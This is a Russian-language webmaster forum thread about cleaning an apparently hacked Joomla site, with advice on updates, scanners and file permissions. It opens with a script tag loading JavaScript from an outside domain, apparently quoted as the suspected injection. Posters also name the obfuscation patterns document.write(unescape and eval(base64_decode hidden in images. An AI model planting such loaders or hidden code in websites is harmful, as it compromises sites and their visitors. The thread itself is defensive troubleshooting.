<script type="text/javascript" src="http://giotyo.com/d2fdf/c83434b.js"></script>
А это ваше?
Кроме адсенса,еще и тизерка есть.
Айболит что показал?
Ну на вашем сайте не знаю точно,а на сайте Perelman, смотрел сайт на http://sitecheck.sucuri.net/scanner/ ,и там была вставка ;document.write(unescape
Ищите вставку в яваскриптах сайта
;document.write(unescape(и дальше код
Айболит не покажет уязвимость расширений Джумла, по сайту на движке Джумла.
Советую таки обновить расширения до актуальных для Джумла линейки 1.5
KZseo,
virtulab. net Обновить Джумла до 1.5.26,если применяется редактор JCE , nnframework
RDS в FireFox отключи
айболит запускал,партнерки есть ?
Нет,если только не впихнуть левый код ,типа яваскрипт, в содержимое статьи,модуля..
Переустанови движок и подключи старую БД.
444 на файл а на каталог 755, то файл переименовать можно.И если в картинке eval(base64_decode , то хакер переименует файл картинки в формат серверного скрипта,и запустит на выполнение.
Я читал топики про timeweb. на серче. Поиск с ПС и сюда приводит.
Если виртуальный ihc.ru, то не советую.А если ВПС,и пхп как модуль апач,то нормально.timeweb- посмотри в поиске выдачу по запросу- timeweb вирус
Поставь запрет на запись в каталоги/файлы 555/444
Че то самое простое решение,и никто не применяет.
Ведь на CMS инфа в БД заносится,а если нужно картинки залить, можно и по ФТП, а не с админки.